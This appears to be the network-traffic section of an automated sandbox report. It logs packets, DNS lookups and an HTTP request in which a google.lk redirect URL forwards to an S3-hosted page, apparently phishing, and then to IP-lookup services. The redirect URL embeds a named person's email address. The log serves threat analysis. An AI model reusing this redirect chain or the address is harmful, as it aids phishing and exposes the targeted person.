                              Nov 29, 2024 15:59:28.034526110 CET4434980213.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:28.034698963 CET4434980213.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:28.034876108 CET49802443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:28.035007954 CET49802443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:28.035027981 CET4434980213.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:28.035038948 CET49802443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:28.035044909 CET4434980213.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:28.037655115 CET49807443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:28.037713051 CET4434980713.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:28.037797928 CET49807443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:28.037946939 CET49807443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:28.037967920 CET4434980713.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:28.040961981 CET4434980413.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:28.041301012 CET49804443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:28.041317940 CET4434980413.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:28.041723967 CET49804443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:28.041728020 CET4434980413.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:28.474776983 CET4434980413.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:28.474843979 CET4434980413.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:28.475039959 CET49804443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:28.475125074 CET49804443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:28.475143909 CET4434980413.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:28.475158930 CET49804443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:28.475163937 CET4434980413.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:28.477899075 CET49808443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:28.477921963 CET4434980813.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:28.477997065 CET49808443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:28.478156090 CET49808443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:28.478162050 CET4434980813.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:29.415668011 CET4434980513.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:29.416146040 CET49805443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:29.416182995 CET4434980513.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:29.416579962 CET49805443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:29.416587114 CET4434980513.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:29.871685982 CET4434980513.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:29.871772051 CET4434980513.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:29.871834040 CET49805443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:29.872030020 CET49805443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:29.872055054 CET4434980513.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:29.874746084 CET49809443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:29.874789953 CET4434980913.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:29.874857903 CET49809443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:29.875036001 CET49809443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:29.875046015 CET4434980913.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:29.970896959 CET4434980613.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:29.971299887 CET49806443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:29.971383095 CET4434980613.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:29.971694946 CET49806443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:29.971710920 CET4434980613.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:30.174396992 CET4434980713.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:30.175297976 CET49807443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:30.175394058 CET4434980713.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:30.175622940 CET49807443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:30.175637007 CET4434980713.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:30.415724039 CET4434980613.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:30.415808916 CET4434980613.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:30.416042089 CET49806443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:30.416162014 CET49806443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:30.416191101 CET4434980613.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:30.416204929 CET49806443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:30.416209936 CET4434980613.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:30.419186115 CET49810443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:30.419234991 CET4434981013.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:30.419320107 CET49810443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:30.419475079 CET49810443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:30.419487000 CET4434981013.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:30.458141088 CET4434980813.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:30.458870888 CET49808443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:30.458885908 CET4434980813.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:30.459419966 CET49808443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:30.459424019 CET4434980813.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:30.618175030 CET4434980713.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:30.618249893 CET4434980713.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:30.618530989 CET49807443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:30.618637085 CET49807443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:30.618662119 CET4434980713.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:30.618676901 CET49807443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:30.618684053 CET4434980713.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:30.621511936 CET49811443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:30.621562004 CET4434981113.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:30.621666908 CET49811443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:30.621829987 CET49811443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:30.621841908 CET4434981113.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:30.943064928 CET4434980813.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:30.943134069 CET4434980813.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:30.943260908 CET49808443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:30.943362951 CET49808443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:30.943377018 CET4434980813.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:30.943387032 CET49808443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:30.943392038 CET4434980813.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:30.946212053 CET49812443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:30.946295023 CET4434981213.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:30.946374893 CET49812443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:30.946542025 CET49812443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:30.946578979 CET4434981213.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:31.508533955 CET4434980913.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:31.509264946 CET49809443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:31.509299040 CET4434980913.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:31.509623051 CET49809443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:31.509629011 CET4434980913.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:31.951536894 CET4434980913.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:31.951627970 CET4434980913.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:31.951843977 CET49809443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:31.951899052 CET49809443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:31.951919079 CET4434980913.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:31.951930046 CET49809443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:31.951935053 CET4434980913.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:31.954797029 CET49813443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:31.954891920 CET4434981313.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:31.955007076 CET49813443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:31.955183983 CET49813443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:31.955213070 CET4434981313.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:32.276213884 CET4434981013.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:32.276755095 CET49810443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:32.276806116 CET4434981013.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:32.277419090 CET49810443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:32.277426004 CET4434981013.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:32.323779106 CET4434979713.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:32.323848009 CET4434979713.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:32.323999882 CET49797443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:32.324129105 CET49797443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:32.324129105 CET49797443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:32.324151993 CET4434979713.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:32.324162006 CET4434979713.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:32.327203989 CET49814443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:32.327301025 CET4434981413.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:32.327387094 CET49814443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:32.327615023 CET49814443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:32.327653885 CET4434981413.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:32.534991026 CET4434981113.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:32.535401106 CET49811443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:32.535437107 CET4434981113.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:32.535855055 CET49811443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:32.535860062 CET4434981113.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:32.712963104 CET4434981213.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:32.713834047 CET49812443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:32.713907003 CET4434981213.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:32.714195967 CET49812443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:32.714214087 CET4434981213.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:32.720649004 CET4434981013.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:32.720721960 CET4434981013.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:32.720777035 CET49810443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:32.720923901 CET49810443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:32.720942974 CET4434981013.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:32.720953941 CET49810443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:32.720958948 CET4434981013.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:32.723565102 CET49815443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:32.723659039 CET4434981513.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:32.723761082 CET49815443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:32.723910093 CET49815443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:32.723937035 CET4434981513.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:32.988142014 CET4434981113.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:32.988220930 CET4434981113.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:32.988296986 CET49811443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:32.988707066 CET49811443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:32.988707066 CET49811443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:32.988725901 CET4434981113.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:32.988735914 CET4434981113.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:32.991328001 CET49816443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:32.991369963 CET4434981613.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:32.991466999 CET49816443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:32.991626978 CET49816443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:32.991641045 CET4434981613.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:33.167613029 CET4434981213.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:33.167680025 CET4434981213.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:33.167742014 CET49812443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:33.168035030 CET49812443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:33.168066025 CET4434981213.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:33.168081045 CET49812443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:33.168087959 CET4434981213.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:33.170589924 CET49817443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:33.170644999 CET4434981713.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:33.171109915 CET49817443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:33.171258926 CET49817443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:33.171267986 CET4434981713.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:33.679632902 CET4434981313.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:33.682408094 CET49813443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:33.682451963 CET4434981313.107.246.63192.168.2.4
                              Nov 29, 2024 15:59:33.683034897 CET49813443192.168.2.413.107.246.63
                              Nov 29, 2024 15:59:33.683039904 CET4434981313.107.246.63192.168.2.4

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Nov 29, 2024 15:58:11.812417984 CET53496241.1.1.1192.168.2.4
                              Nov 29, 2024 15:58:11.861121893 CET53505971.1.1.1192.168.2.4
                              Nov 29, 2024 15:58:14.967542887 CET53586591.1.1.1192.168.2.4
                              Nov 29, 2024 15:58:15.821822882 CET5221253192.168.2.41.1.1.1
                              Nov 29, 2024 15:58:15.821903944 CET6421753192.168.2.41.1.1.1
                              Nov 29, 2024 15:58:15.959954023 CET53642171.1.1.1192.168.2.4
                              Nov 29, 2024 15:58:15.959997892 CET53522121.1.1.1192.168.2.4
                              Nov 29, 2024 15:58:16.797029018 CET5178153192.168.2.41.1.1.1
                              Nov 29, 2024 15:58:16.798646927 CET5106853192.168.2.41.1.1.1
                              Nov 29, 2024 15:58:17.020418882 CET53510681.1.1.1192.168.2.4
                              Nov 29, 2024 15:58:17.040369987 CET53517811.1.1.1192.168.2.4
                              Nov 29, 2024 15:58:19.698628902 CET6002153192.168.2.41.1.1.1
                              Nov 29, 2024 15:58:19.698733091 CET5662753192.168.2.41.1.1.1
                              Nov 29, 2024 15:58:19.837116957 CET53600211.1.1.1192.168.2.4
                              Nov 29, 2024 15:58:19.928486109 CET53566271.1.1.1192.168.2.4
                              Nov 29, 2024 15:58:25.923759937 CET5087253192.168.2.41.1.1.1
                              Nov 29, 2024 15:58:25.924010992 CET5082753192.168.2.41.1.1.1
                              Nov 29, 2024 15:58:26.227706909 CET53508271.1.1.1192.168.2.4
                              Nov 29, 2024 15:58:26.315908909 CET53508721.1.1.1192.168.2.4
                              Nov 29, 2024 15:58:28.300806999 CET138138192.168.2.4192.168.2.255
                              Nov 29, 2024 15:58:28.560205936 CET5030053192.168.2.41.1.1.1
                              Nov 29, 2024 15:58:28.560375929 CET6213653192.168.2.41.1.1.1
                              Nov 29, 2024 15:58:28.702260971 CET53503001.1.1.1192.168.2.4
                              Nov 29, 2024 15:58:29.162656069 CET53621361.1.1.1192.168.2.4
                              Nov 29, 2024 15:58:32.242244959 CET53627931.1.1.1192.168.2.4
                              Nov 29, 2024 15:58:34.466058016 CET6171153192.168.2.41.1.1.1
                              Nov 29, 2024 15:58:34.466413975 CET5079253192.168.2.41.1.1.1
                              Nov 29, 2024 15:58:34.470642090 CET5476853192.168.2.41.1.1.1
                              Nov 29, 2024 15:58:34.470779896 CET6155453192.168.2.41.1.1.1
                              Nov 29, 2024 15:58:34.603893995 CET53617111.1.1.1192.168.2.4
                              Nov 29, 2024 15:58:34.603914976 CET53507921.1.1.1192.168.2.4
                              Nov 29, 2024 15:58:34.607676983 CET53649961.1.1.1192.168.2.4
                              Nov 29, 2024 15:58:34.609587908 CET53547681.1.1.1192.168.2.4
                              Nov 29, 2024 15:58:34.610326052 CET53615541.1.1.1192.168.2.4
                              Nov 29, 2024 15:58:36.343945026 CET5670853192.168.2.41.1.1.1
                              Nov 29, 2024 15:58:36.344108105 CET5768953192.168.2.41.1.1.1
                              Nov 29, 2024 15:58:36.344902039 CET5952953192.168.2.41.1.1.1
                              Nov 29, 2024 15:58:36.345027924 CET5807053192.168.2.41.1.1.1
                              Nov 29, 2024 15:58:36.483079910 CET53595291.1.1.1192.168.2.4
                              Nov 29, 2024 15:58:36.483594894 CET53580701.1.1.1192.168.2.4
                              Nov 29, 2024 15:58:36.768102884 CET53567081.1.1.1192.168.2.4
                              Nov 29, 2024 15:58:36.769434929 CET53576891.1.1.1192.168.2.4
                              Nov 29, 2024 15:58:39.702253103 CET5693353192.168.2.41.1.1.1
                              Nov 29, 2024 15:58:39.702438116 CET5961053192.168.2.41.1.1.1
                              Nov 29, 2024 15:58:39.842303038 CET53596101.1.1.1192.168.2.4
                              Nov 29, 2024 15:58:39.842344999 CET53569331.1.1.1192.168.2.4
                              Nov 29, 2024 15:58:45.979008913 CET53647911.1.1.1192.168.2.4
                              Nov 29, 2024 15:58:51.067842960 CET53562961.1.1.1192.168.2.4
                              Nov 29, 2024 15:59:11.350687981 CET53538841.1.1.1192.168.2.4
                              Nov 29, 2024 15:59:14.020322084 CET53630781.1.1.1192.168.2.4

                              ICMP Packets

                              TimestampSource IPDest IPChecksumCodeType
                              Nov 29, 2024 15:58:19.928595066 CET192.168.2.41.1.1.1c21f(Port unreachable)Destination Unreachable
                              Nov 29, 2024 15:58:29.162744999 CET192.168.2.41.1.1.1c232(Port unreachable)Destination Unreachable

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Nov 29, 2024 15:58:15.821822882 CET192.168.2.41.1.1.10xa166Standard query (0)www.google.comA (IP address)IN (0x0001)false
                              Nov 29, 2024 15:58:15.821903944 CET192.168.2.41.1.1.10x2adfStandard query (0)www.google.com65IN (0x0001)false
                              Nov 29, 2024 15:58:16.797029018 CET192.168.2.41.1.1.10xc38fStandard query (0)google.lkA (IP address)IN (0x0001)false
                              Nov 29, 2024 15:58:16.798646927 CET192.168.2.41.1.1.10xb49bStandard query (0)google.lk65IN (0x0001)false
                              Nov 29, 2024 15:58:19.698628902 CET192.168.2.41.1.1.10x372eStandard query (0)www.google.lkA (IP address)IN (0x0001)false
                              Nov 29, 2024 15:58:19.698733091 CET192.168.2.41.1.1.10xe676Standard query (0)www.google.lk65IN (0x0001)false
                              Nov 29, 2024 15:58:25.923759937 CET192.168.2.41.1.1.10x5b12Standard query (0)i--iy.s3.us-east-1.amazonaws.comA (IP address)IN (0x0001)false
                              Nov 29, 2024 15:58:25.924010992 CET192.168.2.41.1.1.10xa824Standard query (0)i--iy.s3.us-east-1.amazonaws.com65IN (0x0001)false
                              Nov 29, 2024 15:58:28.560205936 CET192.168.2.41.1.1.10x41c7Standard query (0)apnasofa.comA (IP address)IN (0x0001)false
                              Nov 29, 2024 15:58:28.560375929 CET192.168.2.41.1.1.10xa4b5Standard query (0)apnasofa.com65IN (0x0001)false
                              Nov 29, 2024 15:58:34.466058016 CET192.168.2.41.1.1.10xc60eStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                              Nov 29, 2024 15:58:34.466413975 CET192.168.2.41.1.1.10x1084Standard query (0)api.ipify.org65IN (0x0001)false
                              Nov 29, 2024 15:58:34.470642090 CET192.168.2.41.1.1.10xdf5eStandard query (0)apnasofa.comA (IP address)IN (0x0001)false
                              Nov 29, 2024 15:58:34.470779896 CET192.168.2.41.1.1.10x6e88Standard query (0)apnasofa.com65IN (0x0001)false
                              Nov 29, 2024 15:58:36.343945026 CET192.168.2.41.1.1.10x95d2Standard query (0)ipwhois.appA (IP address)IN (0x0001)false
                              Nov 29, 2024 15:58:36.344108105 CET192.168.2.41.1.1.10xbb48Standard query (0)ipwhois.app65IN (0x0001)false
                              Nov 29, 2024 15:58:36.344902039 CET192.168.2.41.1.1.10xefb0Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                              Nov 29, 2024 15:58:36.345027924 CET192.168.2.41.1.1.10x28eStandard query (0)api.ipify.org65IN (0x0001)false
                              Nov 29, 2024 15:58:39.702253103 CET192.168.2.41.1.1.10xfc39Standard query (0)ipwhois.appA (IP address)IN (0x0001)false
                              Nov 29, 2024 15:58:39.702438116 CET192.168.2.41.1.1.10x363eStandard query (0)ipwhois.app65IN (0x0001)false

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Nov 29, 2024 15:58:15.959954023 CET1.1.1.1192.168.2.40x2adfNo error (0)www.google.com65IN (0x0001)false
                              Nov 29, 2024 15:58:15.959997892 CET1.1.1.1192.168.2.40xa166No error (0)www.google.com172.217.21.36A (IP address)IN (0x0001)false
                              Nov 29, 2024 15:58:17.040369987 CET1.1.1.1192.168.2.40xc38fNo error (0)google.lk142.250.181.67A (IP address)IN (0x0001)false
                              Nov 29, 2024 15:58:19.837116957 CET1.1.1.1192.168.2.40x372eNo error (0)www.google.lk172.217.19.227A (IP address)IN (0x0001)false
                              Nov 29, 2024 15:58:26.227706909 CET1.1.1.1192.168.2.40xa824No error (0)i--iy.s3.us-east-1.amazonaws.coms3-r-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                              Nov 29, 2024 15:58:26.315908909 CET1.1.1.1192.168.2.40x5b12No error (0)i--iy.s3.us-east-1.amazonaws.coms3-r-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                              Nov 29, 2024 15:58:26.315908909 CET1.1.1.1192.168.2.40x5b12No error (0)s3-r-w.us-east-1.amazonaws.com52.217.132.146A (IP address)IN (0x0001)false
                              Nov 29, 2024 15:58:26.315908909 CET1.1.1.1192.168.2.40x5b12No error (0)s3-r-w.us-east-1.amazonaws.com52.216.39.42A (IP address)IN (0x0001)false
                              Nov 29, 2024 15:58:26.315908909 CET1.1.1.1192.168.2.40x5b12No error (0)s3-r-w.us-east-1.amazonaws.com52.217.230.34A (IP address)IN (0x0001)false
                              Nov 29, 2024 15:58:26.315908909 CET1.1.1.1192.168.2.40x5b12No error (0)s3-r-w.us-east-1.amazonaws.com54.231.230.50A (IP address)IN (0x0001)false
                              Nov 29, 2024 15:58:26.315908909 CET1.1.1.1192.168.2.40x5b12No error (0)s3-r-w.us-east-1.amazonaws.com52.216.147.112A (IP address)IN (0x0001)false
                              Nov 29, 2024 15:58:26.315908909 CET1.1.1.1192.168.2.40x5b12No error (0)s3-r-w.us-east-1.amazonaws.com52.217.225.10A (IP address)IN (0x0001)false
                              Nov 29, 2024 15:58:26.315908909 CET1.1.1.1192.168.2.40x5b12No error (0)s3-r-w.us-east-1.amazonaws.com52.216.38.218A (IP address)IN (0x0001)false
                              Nov 29, 2024 15:58:26.315908909 CET1.1.1.1192.168.2.40x5b12No error (0)s3-r-w.us-east-1.amazonaws.com3.5.13.136A (IP address)IN (0x0001)false
                              Nov 29, 2024 15:58:28.702260971 CET1.1.1.1192.168.2.40x41c7No error (0)apnasofa.com103.160.107.138A (IP address)IN (0x0001)false
                              Nov 29, 2024 15:58:34.603893995 CET1.1.1.1192.168.2.40xc60eNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                              Nov 29, 2024 15:58:34.603893995 CET1.1.1.1192.168.2.40xc60eNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                              Nov 29, 2024 15:58:34.603893995 CET1.1.1.1192.168.2.40xc60eNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                              Nov 29, 2024 15:58:34.603914976 CET1.1.1.1192.168.2.40x1084No error (0)api.ipify.org65IN (0x0001)false
                              Nov 29, 2024 15:58:34.609587908 CET1.1.1.1192.168.2.40xdf5eNo error (0)apnasofa.com103.160.107.138A (IP address)IN (0x0001)false
                              Nov 29, 2024 15:58:36.483079910 CET1.1.1.1192.168.2.40xefb0No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                              Nov 29, 2024 15:58:36.483079910 CET1.1.1.1192.168.2.40xefb0No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                              Nov 29, 2024 15:58:36.483079910 CET1.1.1.1192.168.2.40xefb0No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                              Nov 29, 2024 15:58:36.483594894 CET1.1.1.1192.168.2.40x28eNo error (0)api.ipify.org65IN (0x0001)false
                              Nov 29, 2024 15:58:36.768102884 CET1.1.1.1192.168.2.40x95d2No error (0)ipwhois.app103.126.138.87A (IP address)IN (0x0001)false
                              Nov 29, 2024 15:58:39.842344999 CET1.1.1.1192.168.2.40xfc39No error (0)ipwhois.app103.126.138.87A (IP address)IN (0x0001)false

                              HTTP Request Dependency Graph

                              • google.lk
                              • fs.microsoft.com
                              • www.google.lk
                              • slscr.update.microsoft.com
                              • i--iy.s3.us-east-1.amazonaws.com
                              • https:
                                • apnasofa.com
                                • api.ipify.org
                                • ipwhois.app
                              • otelrules.azureedge.net

                              HTTPS Proxied Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.4497392.19.202.23443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:58:18 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                              Connection: Keep-Alive
                              Accept: */*
                              Accept-Encoding: identity
                              User-Agent: Microsoft BITS/7.8
                              Host: fs.microsoft.com
                              2024-11-29 14:58:18 UTC479INHTTP/1.1 200 OK
                              Content-Type: application/octet-stream
                              Server: Kestrel
                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                              X-Ms-ApiVersion: Distribute 1.2
                              X-Ms-Region: prod-weu-z1
                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                              X-OSID: 2
                              X-CID: 2
                              X-CCC: GB
                              Cache-Control: public, max-age=128598
                              Date: Fri, 29 Nov 2024 14:58:18 GMT
                              Connection: close
                              X-CID: 2


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.449740142.250.181.674435324C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:58:18 UTC899OUTGET /url?q=ernie.grue@nationalmi.com&nationalmi.com&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html HTTP/1.1
                              Host: google.lk
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              sec-ch-ua-platform: "Windows"
                              Upgrade-Insecure-Requests: 1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                              X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: navigate
                              Sec-Fetch-User: ?1
                              Sec-Fetch-Dest: document
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-11-29 14:58:19 UTC757INHTTP/1.1 301 Moved Permanently
                              Location: https://www.google.lk/url?q=ernie.grue@nationalmi.com&nationalmi.com=&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html
                              Content-Type: text/html; charset=UTF-8
                              Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-S6dGE5pI-LE_gMHbmHqfZQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                              Permissions-Policy: unload=()
